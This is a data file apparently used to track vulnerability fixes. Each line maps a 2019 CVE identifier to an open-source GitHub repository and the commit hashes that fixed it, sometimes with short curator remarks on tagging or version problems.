-CVE-2019-10154;https://github.com/moodle/moodle;None:None;False;2904a7f851da8e66be12f41d55068bf07817fbd6,a3d19efab4aff83c07db9f0ad34c8f0e1f29c64c; -CVE-2019-10157;https://github.com/keycloak/keycloak-nodejs-connect;None:None;False;55e54b55d05ba636bc125a8f3d39f0052d13f8f6; -CVE-2019-10158;https://github.com/infinispan/infinispan;None:None;False;4b381c5910265972ccaabefbdbd16a2b929f6b72,7341da552a13cb9e8a44cd13c984d1f46310653e,245a0d0b169001e5a22c0ec9903942e617c0743f,debdf5447da3626d2f970050ca79cdf98bf87661; -CVE-2019-10174;https://github.com/infinispan/infinispan;None:None;False;a7dab68d194989aaa0b0aa0781cf8ee88fbe3439,7bdc2822ccf79127a488130239c49a5e944e3ca2; -CVE-2019-10184;https://github.com/undertow-io/undertow;None:None;False;5fa7ac68c0e4251c93056d9982db5e794e04ebfa,d2715e3afa13f50deaa19643676816ce391551e9; -CVE-2019-10206;https://github.com/ansible/ansible;None:None;False;d39488ece44956f6a169a498b067bbef54552be1,d728127310b4f3a40ce8b9df3affb88ffaeea073,e9a37f8e3171105941892a86a1587de18126ec5b,4b5aed4e5af4c7aab621662f50a289e99b8ac393; -CVE-2019-10217;https://github.com/ansible/ansible;None:None;False;c1ee1f142db1e669b710a65147ea32be47a91519; -CVE-2019-10219;https://github.com/hibernate/hibernate-validator;None:None;False;20d729548511ac5cff6fd459f93de137195420fe,124b7dd6d9a4ad24d4d49f74701f05a13e56ceee; -CVE-2019-10240;https://github.com/eclipse/hawkbit;None:None;False;fa6520a094a24897035dae4a3af2a69d174c7f9d; -CVE-2019-10241;https://github.com/eclipse/jetty.project;None:None;False;ca77bd384a2970cabbbdab25cf6251c6fb76cd21; -CVE-2019-10246;https://github.com/eclipse/jetty.project;None:None;False;3d028ab2ca76086a742bac7409a3620e81ec4791,1565b5f160e600d08da9b00edf081fb353a443d9,7b774d82e8234231e99b33c19acac3b6f83c0377; -CVE-2019-10247;https://github.com/eclipse/jetty.project;None:None;False;04c994712c0b29824633598cfe0bf709f3b96f09,a15534d72c0c8d84cb821c767343a91584a4fecb,6d847d4a73b34b8c19f43dcf221eefe6859b7d55,b0f72a87d5b35ff0a814143fb1725f7c6fc4e0d7,99f3926d0546032814077cf0d0a684ed80e7bb08,d983890d1769744e7da865de7ff34065fe491a28,9f506e4123b519adccb7df3599441f55daaff31e,5ef8a8abfa63b26a6f978200519730f964ebee0b; -CVE-2019-10248;https://github.com/eclipse/vorto;None:None;False;f15b81fb76b214fe40be164dfb730434ef49ec35; -CVE-2019-10249;https://github.com/eclipse/xtext-xtend;None:None;False;f34464b117bd38e8b844b01d94cf5b072b07f6ec,169de2cecc50ed9bf81c3cdc496ad8a799bdf17b; -CVE-2019-10255;https://github.com/jupyter/notebook;None:None;False;b9d9e659e9b2edd70767129c06ac76761e046791,b981c5b055041c036e05e735694c60863075247d,70fe9f0ddb3023162ece21fbb77d5564306b913b,08c4c898182edbe97aadef1815cce50448f975cb; -CVE-2019-10354;https://github.com/jenkinsci/jenkins;None:None;False;279d8109eddb7a494428baf25af9756c2e33576b; commit timestamp is outside the time interval -CVE-2019-10641;https://github.com/contao/contao;None:None;False;b92e27bc7c9e59226077937f840c74ffd0f672e8,74c7dfafa0dfa5363a9463b486522d5d526e28fe; -CVE-2019-10642;https://github.com/contao/contao;None:None;False;ee2c8130c2e68a1d0d2e75bd6b774c4393942b15; -CVE-2019-10643;https://github.com/contao/contao;None:None;False;70348cc812b110831ad66a4f9857883f75649b88; missing exact subversions (says only 4.7) -CVE-2019-10682;https://github.com/relekang/django-nopassword;None:None;False;d8b4615f5fbfe3997d96cf4cb3e342406396193c; -CVE-2019-10745;https://github.com/jonschlinkert/assign-deep;None:None;False;90bf1c551d05940898168d04066bbf15060f50cc; commit has no tags -CVE-2019-10748;https://github.com/sequelize/sequelize;None:None;False;a72a3f50bad7772ce96fc62d80f64b109fb2893f; -CVE-2019-10749;https://github.com/sequelize/sequelize;None:None;False;ee4017379db0059566ecb5424274ad4e2d66bc68; -CVE-2019-10750;https://github.com/alexindigo/deeply;None:None;False;6eccb2f03ec8d3eefc6805053c4cc2a36aab1505; -CVE-2019-10751;https://github.com/httpie/httpie;None:None;False;df36d6255df5793129b02ac82f1010171bd8a0a8; Repo changed in the meantime -CVE-2019-10752;https://github.com/sequelize/sequelize;None:None;False;9bd0bc111b6f502223edf7e902680f7cc2ed541e; -CVE-2019-10754;https://github.com/apereo/cas;None:None;False;40bf278e66786544411c471de5123e7a71826b9f; commit timestamp is outside the time interval -CVE-2019-10756;https://github.com/node-red/node-red-dashboard;None:None;False;870382792f679b0a6bbf45b29ca7f6428e51623b; -CVE-2019-10757;https://github.com/knex/knex;None:None;False;988fb243898d746a759d422762685a79eddf99ca; -CVE-2019-10760;https://github.com/commenthol/safer-eval;None:None;False;1c29f6a6e304fb650c05056e217e457a0d2cc3c5; -CVE-2019-10762;https://github.com/catfan/Medoo;None:None;False;659864b393961bf224bba1efc03b7dcbed7de533; -CVE-2019-10763;https://github.com/pimcore/pimcore;None:None;False;9182f03c80bb7f08aae4efd4a0788e2be6368d96,608ef5d81ba34d034c9b70519bbc6806ad115d68; -CVE-2019-10764;https://github.com/simplito/elliptic-php;None:None;False;15652609aa55968d56685c2a9120535ccdc00fd9; -CVE-2019-10766;https://github.com/usmanhalalit/pixie;None:None;False;9bd991021abbcbfb19347a07dca8b7e518b8abc9,747dd46a967de4e9a944c56f7597e2a2378829c6; -CVE-2019-10767;https://github.com/ioBroker/ioBroker.js-controller;None:None;False;f6e292c6750a491a5000d0f851b2fede4f9e2fda; -CVE-2019-10768;https://github.com/angular/angular.js;None:None;False;add78e62004e80bb1e16ab2dfe224afa8e513bc3,e242e9b5952edcb5c362b80e77a30379d565cf8f,726f49dcf6c23106ddaf5cfd5e2e592841db743a; -CVE-2019-10770;https://github.com/ratpack/ratpack;None:None;False;c1d4357bbc4bceb24abb156fbb471257a0177eb6,a3cbb13be1527874528c3b99fc33517c0297b6d3; -CVE-2019-10771;https://github.com/ioBroker/ioBroker.web;None:None;False;24ebb6d3714feac87570ce7a2e827fd2f91aa043; -CVE-2019-10773;https://github.com/yarnpkg/yarn;None:None;False;039bafd74b7b1a88a53a54f8fa6fa872615e90e7,8cd85c9c463fb75df0621fc256126dca169bdc3f,85d8d79892e967f6529716a05cb4a9bc9769f811,ef69693037865be3389ac470de8a4891ec4faf18,35a884ec448b4cad193feb08aa9ff20e7397894d,752ce39e0de09df42f17dc982b18f91c8130e613,cefe4c529816f94cfefbb78c1b0d16d7da895b64; -CVE-2019-10774;https://github.com/mikehaertl/php-shellcommand;None:None;False;8d98d8536e05abafe76a491da87296d824939076,c2ef7dbdb38a0a477394975097655c00adec97c4; -CVE-2019-10776;https://github.com/kellyselden/git-diff-apply;None:None;False;106d61d3ae723b4257c2a13e67b95eb40a27e0b5; -CVE-2019-10777;https://github.com/awspilot/cli-lambda-deploy;None:None;False;0985a18bffb265817bc84836c9a65f2bb04a51ac; -CVE-2019-10778;https://github.com/guybedford/devcert;None:None;False;571f4e6d077f7f21c6aed655ae380d85a7a5d3b8; -CVE-2019-10780;https://github.com/inukshuk/bibtex-ruby;None:None;False;14406f4460f4e1ecabd25ca94f809b3ea7c5fb11; -CVE-2019-10781;https://github.com/schema-inspector/schema-inspector;None:None;False;345a7b2eed11bb6128421150d65f4f83fdbb737d; -CVE-2019-10787;https://github.com/Turistforeningen/node-im-resize;None:None;False;de624dacf6a50e39fe3472af1414d44937ce1f03; -CVE-2019-10792;https://github.com/diegohaz/bodymen;None:None;False;5d52e8cf360410ee697afd90937e6042c3a8653b; -CVE-2019-10793;https://github.com/rhalff/dot-object;None:None;False;f76cff5fe6d01d30ce110d8f454db2e5bd28a7de; -CVE-2019-10795;https://github.com/remy/undefsafe;None:None;False;f272681b3a50e2c4cbb6a8533795e1453382c822; -CVE-2019-10797;https://github.com/wso2/transport-http;None:None;False;4a4dc99c7b259646ee5e23b7aaa7c3a8bac959c1; my bad i used two times 6.3.1 -CVE-2019-10799;https://github.com/eiskalteschatten/compile-sass;None:None;False;d9ada7797ff93875b6466dea7a78768e90a0f8d2; -CVE-2019-10806;https://github.com/vega/vega;None:None;False;27881f21af7d51fe0dc2fdbd92eabd34974310f1,8f33a0b5170d7de4f12fc248ec0901234342367b; -CVE-2019-10867;https://github.com/pimcore/pimcore;None:None;False;38a29e2f4f5f060a73974626952501cee05fda73; -CVE-2019-10874;https://github.com/bolt/bolt;None:None;False;127434d79990b54abfb3e830243deaf725baa4de,91187aef36363a870d60b0a3c1bf8507af34c9e4; -CVE-2019-10904;https://github.com/roundup-tracker/roundup;None:None;False;a2edc3cba0b5d34005114f6da0251bd9ac2837df; -CVE-2019-10912;https://github.com/symfony/symfony;None:None;False;4fb975281634b8d49ebf013af9e502e67c28816b,d140648929b296ee5b27cbcf407672b3ae3980dc,4b18b32133d889cce605aa15242251bf485895de,b224d4f012dbd8c53cecb22254642e7e1fb70f40,d77e44569785329702ea55ead8938776080989b7; -CVE-2019-11016;https://github.com/Elgg/Elgg;None:None;False;482d19801fc0149f8605604415e90e69333c6347,bd194d1baa89ca271411b74569bcd806b9fa62e6; -CVE-2019-11082;https://github.com/dkpro/dkpro-core;None:None;False;6bdca97de39983083e400cb8715c019fe508b912,ceb749a82e15dc538793ae3fa0c06826dadbde24,0d7048e7130ddc901445281b777207d97f74e664,b7ab1ed62466fbbb852f8c97bdb888e2be10c2eb,0371975bab12f8f94e2f3c655922a360c76b7519,9c4c5d579355d2f9c5dc16eade0bc046be233035; -CVE-2019-11244;https://github.com/kubernetes/kubernetes;None:None;False;730bc968b95842022c4c81d607bf6411b459a675,f228ae3364729caed59087e23c42868454bc3ff4,b83756b3181f464720bfb468a171a58fc110c3e8,f6cee7a330a3b6f67701da4d0e76e65aa02a9159,4ccdc8b71b2790b2853b3ac43cdda623f8b22b12,6e4df6a7f27ecadbdec06fe92d915faabee33300,211b1ada57ae0b85dd08c4c353c90305fa1f14c9,8bebb336d0dfa07c70f92ca81fd88986d2a3192b; fixed version is vulnerable -CVE-2019-11245;https://github.com/kubernetes/kubernetes;None:None;False;7d58a4985dc157952a4f38f544a80ce4bf019471,9bba83f2c2e3a2432943fc2ee987cb7f264d9449,6c1b3b4f623b35a11a298194810078f4093c13f2,02026415cdc49b4ceb1b70e0410a93b57885851e,78254d555a2958483780818ac83f899ff9aa6296,91e593546c8396d6b764ff0832483411f5a3f3d3; example-case of uselesness of prospector, the issue mentioned in the advisory leads to all the right commits -CVE-2019-11269;https://github.com/spring-projects/spring-security-oauth;None:None;False;cb714f4cee45ce2807320ded38ed0bee846f2397,346bb74d28d7292afa30ce538c68cabc51d91777,1434dcf0c731dd1ee50d52520b1e24c15eb1f009,f769ff98c7b0c7aba42dd67538f6912c8e0d2ef7; -CVE-2019-11272;https://github.com/spring-projects/spring-security;None:None;False;b2d4fec3617c497c5a8eb9c7e5270e0c7db293ee; -CVE-2019-11289;https://github.com/cloudfoundry/gorouter;None:None;False;b1b5c44e050f73b399b379ca63a42a2c5780a83f; -CVE-2019-11325;https://github.com/symfony/symfony;None:None;False;d446d7733abd8807ff43e7a689065e6ebc48e32a,0524868cbf3d3a36e0af804432016d5a6d98169a; -CVE-2019-11328;https://github.com/hpcng/singularity;None:None;False;b4dcb0e4d77baa1c7647a4a5705ea824bb4e0dca; vulnerable tag is fixed -CVE-2019-11358;https://github.com/jquery/jquery;None:None;False;753d591aea698e57d6db58c9f722cd0808619b1b; -CVE-2019-11405;https://github.com/OpenAPITools/openapi-generator;None:None;False;cce35d75a4e69d09ec81ff1ece637d39b0f6f00e,54d9c19c7707285d7b3f9749762a5cf1a9c4336c; -CVE-2019-11458;https://github.com/cakephp/cakephp;None:None;False;1a74e798309192a9895c9cedabd714ceee345f4e,c25b91bf7c72db43c01b47a634fd02112ff9f1cd,81412fbe2cb88a304dbeeece1955bc0aec98edb1,2434f9ba4740759bf10947fbb5d3ebccce8e5cb9; -CVE-2019-11470;https://github.com/ImageMagick/ImageMagick;None:None;False;e3cdce6fe12193f235b8c0ae5efe6880a25eb957,fedaa752e53f37258139fcc8802aad426f111bc0; -CVE-2019-11512;https://github.com/contao/contao;None:None;False;87d92f823b08b91a0aeb522284537c8afcdb8aba; -CVE-2019-11514;https://github.com/flarum/core;None:None;False;66607a56749339d50620b049701ad4d6a4dafbd7; -CVE-2019-11767;https://github.com/phpbb/phpbb;None:None;False;dc5a167c429a3813d66b0ae3d14242650466cac6; -CVE-2019-11768;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c1ecafc38319e8f768c9259d4d580e42acd5ee86; -CVE-2019-11777;https://github.com/eclipse/paho.mqtt.java;None:None;False;a0bbf1e7da158ae191582f032343c6171e6a0b44; -CVE-2019-11808;https://github.com/ratpack/ratpack;None:None;False;7b2f09eeeba1e460ad8702930a8a8933a2dbe1e9,f2b63eb82dd71194319fd3945f5edf29b8f3a42d; -CVE-2019-12041;https://github.com/jonschlinkert/remarkable;None:None;False;30e2bf05c12bbb12f04ffa0544df475d1ccc18d2,287dfbf22e70790c8b709ae37a5be0523597673c; -CVE-2019-12086;https://github.com/FasterXML/jackson-databind;None:None;False;d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8,efc3c0d02f4743dbaa6d1b9c466772a2f13d966b,dda513bd7251b4f32b7b60b1c13740e3b5a43024; -CVE-2019-12203;https://github.com/silverstripe/silverstripe-framework;None:None;False;a6763298fef6b876597c3170c7aef710a62bb55c,eccfa9b10d246d741de2fa83d502339d45068983,569237c0f4d16ac6f927aeb0ed8c9b8787490080,a86093fee6398881889d6d330a15f7042be25bff; fixed version is vulnerable -CVE-2019-12245;https://github.com/silverstripe/silverstripe-assets;None:None;False;1df69c4a4d6258ebe5c4030fd7c78c6a75e94167,73e0cc69dc499c24aa706af9eddd8a2db2ac93e0; wrong advisory version -CVE-2019-12277;https://github.com/blogifierdotnet/Blogifier;None:None;False;3e2ae11f6be8aab82128f223c2916fab5a408be5; -CVE-2019-12308;https://github.com/django/django;None:None;False;c238701859a52d584f349cce15d56c8e8137c52b,deeba6d92006999fee9adfbd8be79bf0a59e8008,afddabf8428ddc89a332f7a78d0d21eaf2b5a673,09186a13d975de6d049f8b3e05484f66b01ece62; -CVE-2019-12313;https://github.com/dollarshaveclub/shave;None:None;False;1876911e423c00fdda643ef724d956b3d324d5c2,da7371b0531ba14eae48ef1bb1456a3de4cfa954; -CVE-2019-12387;https://github.com/twisted/twisted;None:None;False;8a473397d5cdecff38b95a94fc7fc75dd06217dc,6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2; The nvd advisory links a commit having the cve in the message but the oldest tag is twisted-19.7.0 -CVE-2019-12402;https://github.com/apache/commons-compress;None:None;False;4ad5d80a6272e007f64a6ac66829ca189a8093b9; -CVE-2019-12404;https://github.com/apache/jspwiki;None:None;False;d71ecf657ef3366f1790d9f09364812c78f7f8c2; -CVE-2019-12405;https://github.com/apache/trafficcontrol;None:None;False;f780aff77a52d52a37b4d1cc3e8e801c0b557356,54f105dfd6069945ec12c89d965532e6f5185935; -CVE-2019-12407;https://github.com/apache/jspwiki;None:None;False;f43ac386c8cd3e5fed7069e8fc8286668c86b5f8; -CVE-2019-12418;https://github.com/apache/tomcat;None:None;False;a91d7db4047d372b2f12999d3cf2bc3254c20d00,1fc9f589dbdd8295cf313b2667ab041c425f99c3,bef3f40400243348d12f4abfe9b413f43897c02b; -CVE-2019-12419;https://github.com/apache/cxf;None:None;False;6bf89927d3e07197d49453b00d673eadce696cf9,db6069667708a59c75a785f310d4a2df3698122c,661c271f4890b05896eee5de9cb8fb503fb3bccb; -CVE-2019-12422;https://github.com/apache/shiro;None:None;False;44f6548b97610cdf661976969d5735c0be14a57b,a8018783373ff5e5210225069c9919e071597d5e; -CVE-2019-12423;https://github.com/apache/cxf;None:None;False;8b40fdba289c62f4defae51c1f76860f0159c441,2de7e14eb95626fffef6f61365186de9a1c9de3d; -CVE-2019-12616;https://github.com/phpmyadmin/phpmyadmin;None:None;False;015c404038c44279d95b6430ee5a0dddc97691ec; -CVE-2019-12617;https://github.com/silverstripe/silverstripe-framework;None:None;False;8b7063a8e2773e2bbec3cabf94ed86e11f607071,5af205993d24b4bafc00dea94efc2c31305bca83; fixed version is vulnerable -CVE-2019-12741;https://github.com/hapifhir/hapi-fhir;None:None;False;8f41159eb147eeb964cad68b28eff97acac6ea9a; -CVE-2019-12748;https://github.com/TYPO3/TYPO3.CMS;None:None;False;4c003f80b8b25def173268b8b069446c4fcc313a,96105753aa6a61397ea47dc6fbe23f1f994fe32e,6dcbf981f89bed5826e3e284e0441d8e3a50bae6; -CVE-2019-12781;https://github.com/django/django;None:None;False;54d0f5e62f54c29a12dd96f44bacd810cbe03ac8,77706a3e4766da5d5fb75c4db22a0a59a28e6cd6,32124fc41e75074141b05f10fc55a4f01ff7f050,1e40f427bb8d0fb37cc9f830096a97c36c97af6f; -CVE-2019-12814;https://github.com/FasterXML/jackson-databind;None:None;False;5f7c69bba07a7155adde130d9dee2e54a54f1fa5; -CVE-2019-13127;https://github.com/jgraph/mxgraph;None:None;False;76e8e2809b622659a9c5ffdc4f19922b7a68cfa3; -CVE-2019-13135;https://github.com/ImageMagick/ImageMagick;None:None;False;cdb383749ef7b68a38891440af8cc23e0115306d; -CVE-2019-13173;https://github.com/npm/fstream;None:None;False;6a77d2fa6e1462693cf8e46f930da96ec1b0bb22; -CVE-2019-13209;https://github.com/rancher/rancher;None:None;False;0ddffe484adccb9e37d9432e8e625d8ebbfb0088; -CVE-2019-13295;https://github.com/ImageMagick/ImageMagick;None:None;False;a7759f410b773a1dd57b0e1fb28112e1cd8b97bc; -CVE-2019-13574;https://github.com/minimagick/minimagick;None:None;False;4cd5081e58810d3394d27a67219e8e4e0445d851; -CVE-2019-13644;https://github.com/firefly-iii/firefly-iii;None:None;False;def307010c388c4e92d7066671ad62e477cc087a; advisory link is a first uncomplete fix -CVE-2019-14262;https://github.com/drewnoakes/metadata-extractor-dotnet;None:None;False;c9a8a9ac4376725084bd7c3c11af50c74cf58d44,3142e5e6a95f2760ace1d2fdd9d50a97eb1c0e23; -CVE-2019-14280;https://github.com/craftcms/cms;None:None;False;7e7b9756da942d70b930a5e9a8ea4767f3920d00,a3844e019bbc3c67a2f9ba581a758d785efa9e26; -CVE-2019-14537;https://github.com/YOURLS/YOURLS;None:None;False;9e36c67b01b932a41f0834d7896c7ba8383e9f07; -CVE-2019-14540;https://github.com/FasterXML/jackson-databind;None:None;False;d4983c740fec7d5576b207a8c30a63d3ea7443de; -CVE-2019-14668;https://github.com/firefly-iii/firefly-iii;None:None;False;3ad4e04e2ae50e60564b60b68dfac083e5684882; -CVE-2019-14669;https://github.com/firefly-iii/firefly-iii;None:None;False;2ddf48f15cbdbb475221c299872420f625c3bc3f; -CVE-2019-14671;https://github.com/firefly-iii/firefly-iii;None:None;False;e80d616ef4397e6e764f6b7b7a5b30121244933c; -CVE-2019-14672;https://github.com/firefly-iii/firefly-iii;None:None;False;8717f469b10e9f7e1547c6f70f7d24e1359d28d4; -CVE-2019-14751;https://github.com/nltk/nltk;None:None;False;f59d7ed8df2e0e957f7f247fe218032abdbe9a10; -CVE-2019-14806;https://github.com/pallets/werkzeug;None:None;False;00bc43b1672e662e5e3b8cecd79e67fc968fa246; -CVE-2019-14837;https://github.com/keycloak/keycloak;None:None;False;9a7c1a91a59ab85e7f8889a505be04a71580777f; -CVE-2019-14838;https://github.com/wildfly/wildfly-core;None:None;False;2d527803dc10add8806fa0dd66f409dc511f92ec,131fa6880ae1523fac9e96df54dc394b63b0eed3,80e18b46f73f9d061d4150c66e6dc2fc1fd0bc41; had to look for tags manually (commits have no tags) -CVE-2019-14862;https://github.com/knockout/knockout;None:None;False;7e280b2b8a04cc19176b5171263a5c68bda98efb; -CVE-2019-14863;https://github.com/angular/angular.js;None:None;False;f33ce173c90736e349cf594df717ae3ee41e0f7a; -CVE-2019-14892;https://github.com/FasterXML/jackson-databind;None:None;False;819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b,41b7f9b90149e9d44a65a8261a8deedc7186f6af; -CVE-2019-14893;https://github.com/FasterXML/jackson-databind;None:None;False;998efd708284778f29d83d7962a9bd935c228317; -CVE-2019-14933;https://github.com/bagisto/bagisto;None:None;False;6a4cb016c4b1fa218c86b19b944fe88cab89c82d,747f2147396acb5e9477431e6847a7cf82e62614,e88bf10c55ee6ad89c0a81ad539ca9695aaa9999,09d6afc72aa055a389139f14e3d643927cea7501,61fd02ed576c4588dd72757da8e59fe1697a76e9,1e6579bedff68ab22f9160c2f4a0b7f4cbc9de60,d8d645eb4122a951ac89c3cbe6086b33a4707a2a,8cfcf3d4844bbc58623c02fab6da9bb1a1d619d3,6c74b2ca4269ac62f051d0a5a50a3ec8070c988c,c7482f576ec79b3c03119239b35c8b4c75a8e0a3,5c94a8a21fb0c79886975e4c489eecc131a9939f,1033bd8d315c47b95042a16b5b3b79fb17a796e5,82e56334c29d40ae66b9f74415962d8cdec86fcd,2df1a84191eb0cb67c5514e4fbbe936ef6883067,dadbf2bd6aa32c66a74028643c72a9e71b7fc314; -CVE-2019-14980;https://github.com/ImageMagick/ImageMagick;None:None;False;c5d012a46ae22be9444326aa37969a3f75daa3ba; -CVE-2019-15062;https://github.com/Dolibarr/dolibarr;None:None;False;18eb2a83fe7c2d01bdb34cceec389a6f9541e1f6,9692ea5faf2ef69bec7328feda1a23092ce55143,d21e5571007d2052a6b5f80a67b6f4cac693584a; vulnerable tag is fixed -CVE-2019-15477;https://github.com/jooby-project/jooby;None:None;False;27b4af283de1a2c2a6b0530039b46eef75ddf655,34856a738829d8fedca4ed27bd6ff413af87186f,395dab7e80474ac0c2c32d81f61cda2c8331a46b; -CVE-2019-15481;https://github.com/kevinpapst/kimai2;None:None;False;a0e8aa3a435717187fb12210242dab1b7c97ff3f; -CVE-2019-15482;https://github.com/SLMNBJ/selectize-plugin-a11y;None:None;False;99c14f7644fdfc815625d7b54829e6c2dca31a8b,927d81e9ea86acac1724d57b2ce9f3c962fd34c4; -CVE-2019-15483;https://github.com/bolt/bolt;None:None;False;7910ea8443377bf661ac49a80015eb25f69cdfd5,45780faa7ee5263a5a5ca4cfe102830ef244b06a; -CVE-2019-15484;https://github.com/bolt/bolt;None:None;False;2634a56c0db25a6a7e917a78ab8f9fc430f03a51,520c4578acfd0193b08cabd924598e6dd0edf98f; -CVE-2019-15485;https://github.com/bolt/bolt;None:None;False;1ef623734b555fc5dbcd6d735cf2ecf8b2d22cd1,bd7e9393f24ef162e354b28b82b85d1865d6c0e8; -CVE-2019-15486;https://github.com/ierror/django-js-reverse;None:None;False;a3b57d1e4424e2fadabcd526d170c4868d55159c,78d6aff2276f2d341f643b095515f8aaba5e67c2; -CVE-2019-15532;https://github.com/gchq/CyberChef;None:None;False;01f0625d6a177f9c5df9281f12a27c814c2d8bcf; -CVE-2019-15587;https://github.com/flavorjones/loofah;None:None;False;0c6617af440879ce97440f6eb6c58636456dc8ec,e323a776dd2755a837a67895eaa3cdae44495254; wrong cve id in linked issue... -CVE-2019-15599;https://github.com/pkrumins/node-tree-kill;None:None;False;ff73dbf144c4c2daa67799a50dfff59cd455c63c,deee138a8cbc918463d8af5ce8c2bec33c3fd164; -CVE-2019-15608;https://github.com/yarnpkg/yarn;None:None;False;34efd23305b9da701aae96f29302b71a5a0ea2e6,fa746451eeae79ec35e87bbec14576d6831984fe; -CVE-2019-15657;https://github.com/mysticatea/eslint-utils;None:None;False;08158db1c98fd71cf0f32ddefbc147e2620e724c; -CVE-2019-15658;https://github.com/voxpelli/node-connect-pg-simple;None:None;False;df61c9507f804ba72803e4f567c3cbcfa0a9d7e1; -CVE-2019-15782;https://github.com/webtorrent/webtorrent;None:None;False;7e829b5d52c32d2e6d8f5fbcf0f8f418fffde083,22546df6d9ba9ca4523142d98b5e70f6db213f3e,cdf1159cc0227b1f85c4a52263cbd33bc4ed5242,9029557ca3d22faef67315f8ed33df295ce6d59e; -CVE-2019-16060;https://github.com/airbrake/airbrake-ruby;None:None;False;d29925e7838031bf7dea7016b22de52532503796,45b1306590c345ed798f3290d32eb1deb38b9945; -CVE-2019-16097;https://github.com/goharbor/harbor;None:None;False;290da4dc7bd11532800c13cfa125b300231f76f4,1559c8ccd19ac6bd128d2cc91c4cc0b3ac4b35a2,7d151946e0e2d2b23ddb8f6ca2d16a9413acf7d9,b6db8a8a106259ec9a2c48be8a380cb3b37cf517; -CVE-2019-16145;https://github.com/padrino/padrino-contrib;None:None;False;85e087ef40cbc3c6244d5301b6d7da63ba1ade20,662616162265a74da5a35b55c10f85d8168fc635; commit has no tags, the commits appear in zero tags so we filter them out -CVE-2019-16197;https://github.com/Dolibarr/dolibarr;None:None;False;cabbdfc650a1f2b4f0fe04bf29bab0b3cfc2ee63; -CVE-2019-16317;https://github.com/pimcore/pimcore;None:None;False;6ee5d8536d0802e377594cbe39083e822710aab9; -CVE-2019-16318;https://github.com/pimcore/pimcore;None:None;False;732f1647cc6e0a29b5b1f5d904b4d726b5e9455f; -CVE-2019-16335;https://github.com/FasterXML/jackson-databind;None:None;False;73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db; -CVE-2019-16403;https://github.com/bagisto/bagisto;None:None;False;4a2efc8eee0b8cc2ce807288f06a843c8e10701b,06aa4dd6bf1569ec2f76fe49fb4cf177e24539e0,40ebb3a0c43ca8754ff5be46afdeb298ee91bd95; fixed version is vulnerable -CVE-2019-16676;https://github.com/heartcombo/simple_form;None:None;False;8c91bd76a5052ddf3e3ab9fd8333f9aa7b2e2dd6; -CVE-2019-16761;https://github.com/simpleledger/slp-validate.js;None:None;False;50ad96c2798dad6b9f9a13333dd05232defe5730; -CVE-2019-16762;https://github.com/simpleledger/slpjs;None:None;False;ac8809b42e47790a6f0205991b36f2699ed10c84; -CVE-2019-16763;https://github.com/mpetroff/pannellum;None:None;False;cc2f3d99953de59db908e0c6efd1c2c17f7c6914; -CVE-2019-16766;https://github.com/labd/wagtail-2fa;None:None;False;a6711b29711729005770ff481b22675b35ff5c81; -CVE-2019-16768;https://github.com/Sylius/Sylius;None:None;False;fd43ee5321668c0777aa2c023a88a613bd2b2d58,8b68ff784d16930c86266b0ab93d06ba9fd12a19,19b2fe4a6cdb2186489221ea8b5e5628c8223286,51dd1fe1a97b116507d1651591f91413411f1a86,e9bd800c25ed4a4f3580054df7019e965c57c4f5; -CVE-2019-16769;https://github.com/yahoo/serialize-javascript;None:None;False;16a68ab53d9626fc7c942b48a1163108fcd184c8; -CVE-2019-16770;https://github.com/puma/puma;None:None;False;98a1f03e5ebe40cf56b65b0bf60adf97057e0eaf,6baa4d8e1c88f2e4db2918df48416a5c49feec40,06053e60908074bb38293d4449ea261cb009b53e; -CVE-2019-16771;https://github.com/line/armeria;None:None;False;b597f7a865a527a84ee3d6937075cfbb4470ed20; -CVE-2019-16772;https://github.com/commenthol/serialize-to-js;None:None;False;181d7d583ae5293cd47cc99b14ad13352875f3e3,d0234d3a3cea6edaeb2c22df0d359164967234a2; -CVE-2019-16774;https://github.com/PHPSocialNetwork/phpfastcache;None:None;False;82a84adff6e8fc9b564c616d0fdc9238ae2e86c3,c4527205cb7a402b595790c74310791f5b04a1a4,34d680b18e79e9d7f0874a5a06d23371dc326b26,17f77676adfe1e0b24a139dcaa0586d283fbfcef; -CVE-2019-16778;https://github.com/tensorflow/tensorflow;None:None;False;db4f9717c41bccc3ce10099ab61996b246099892; -CVE-2019-16779;https://github.com/excon/excon;None:None;False;ccb57d7a422f020dc74f1de4e8fb505ab46d8a29; -CVE-2019-16782;https://github.com/rack/rack;None:None;False;7fecaee81f59926b6e1913511c90650e76673b38,3232f9370d099e784a16c01d32e8a2da4a953f18,15da2e5d95228d0b3fcdb38b2a562efc333402f0,1a532d13eee9d5546349b5253a204187773de151,b9565a90eea77960e552e3c86b0adb83ab034726,368effdbeca7955f4e46ea51bfb2d647bc79aa6b,d49aa811d6c8fe109c7fc5ca9bddb3d9f7eba796,3e9cb660cc8bf9543b134b6f3ca35aadfe4e0611,442dba2362558e4a7a3e39d437b95d81f2479b31,3ab0277cd129f15059662451718048bcf23cb5d1,7237b6661ad98c1dac6ad799192262697e1a3559,511f809e80c3264af3a26d485a5137ac28f08ebe,5b1cab667270d7ad1a4d2088adf5ff4eb9845496,1e96e0f197777458216bb3dfdbcce57a0bbba0c5,3ba123d278f1085ba78fc000df954e507af2d622,dc45a06b339c707c1f658c123ec7216151878f7a,73a5f79f6854eed81ecc3e5fb9f8154e967ccc49,4e322629e0c6698c75a3fb541a42571f8543c34c,1c7e3b259f0741c869dcfbabeb3e0670c4d3f848,2b205ed5a047d9e50a13bb7a411bc48745b515ec,bb3d486644755b2e0c7824b3910db1a83c98fcd2,77f3aab73089abe518f62c46268b104bacd7114b,83d4bd12c7e88455d21230bc24ec3a543654e2aa; -CVE-2019-16784;https://github.com/pyinstaller/pyinstaller;None:None;False;42a67148b3bdf9211fda8499fdc5b63acdd7e6cc; -CVE-2019-16785;https://github.com/Pylons/waitress;None:None;False;8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba; -CVE-2019-16786;https://github.com/Pylons/waitress;None:None;False;f11093a6b3240fc26830b6111e826128af7771c3; -CVE-2019-16789;https://github.com/Pylons/waitress;None:None;False;11d9e138125ad46e951027184b13242a3c1de017; -CVE-2019-16792;https://github.com/Pylons/waitress;None:None;False;575994cd42e83fd772a5f7ec98b2c56751bd3f65; -CVE-2019-16869;https://github.com/netty/netty;None:None;False;39cafcb05c99f2aa9fce7e6597664c9ed6a63a95,017a9658c97ff1a1355c31a6a1f8bd1ea6f21c8d; 